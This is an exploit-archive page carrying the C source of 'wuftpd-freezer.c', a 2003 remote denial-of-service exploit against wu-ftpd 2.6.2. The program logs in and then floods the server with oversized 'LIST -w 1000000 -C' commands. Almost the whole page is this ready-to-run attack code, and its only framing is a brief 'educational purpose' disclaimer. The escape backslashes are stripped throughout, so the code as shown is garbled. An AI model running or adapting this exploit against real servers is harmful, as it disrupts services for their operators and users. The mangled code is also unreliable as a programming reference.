wu-ftpd 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : wu-ftpd 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c)
# Published : 2003-10-31
# Author : Angelo Rosiello
# Previous Title : Need for Speed 2 Remote Client Buffer Overflow Exploit
# Next Title : MS Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)

/*
*     (c) Rosiello Security
*
* Copyright Rosiello Security 2003
*   All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo rosiello org
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
	int i, sd, PORT, loop, error;
	char user[30], password[30], ch;
	struct sockaddr_in server_addr;

        fprintf( stdout, "n(c) Rosiello Security 2003n" );
        fprintf( stdout, "http://www.rosiello.orgn" );
        fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiellonn" );

	if( argc != 6 ) usage( argv[0] );

	if( strlen( argv[3] ) > 20 ) exit( 0 );
	if( strlen( argv[4] ) > 20 ) exit( 0 );

	sprintf( user, "USER %sn", argv[3] );
	sprintf( password, "PASS %sn", argv[4] );

	PORT = atoi( argv[2] );
	loop = atoi( argv[5] );

	addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
	sd = socket( AF_INET, SOCK_STREAM, 0 );

  	error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
	if( error != 0 )
	{
		perror( "Something wrong with the connection" );
		exit( 0 );
	}

	while ( ch != 'n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

	ch = '';

	printf( "Connection executed, now waiting to log in...n" );

	printf( "%s", user );

	send( sd, user, strlen( user ), 0 );
	while ( ch != 'n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}
	printf( "%s", password );

	ch = '';

 	send( sd, password, strlen( password ), 0 );
        while ( ch != 'n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

	printf( "Sending the DoS queryn" );
	for( i=0; i<loop; i++ )
	{
		write( sd, "LIST -w 1000000 -Cn", 19 );
	}
	printf( "All donen" );
	close( sd );
	return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
     	address -> sin_family = AF_INET;
     	address -> sin_port = htons((u_short)port);
     	address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
	fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>n", program);
  	exit(0);
}


// www.Syue.com [2003-10-31]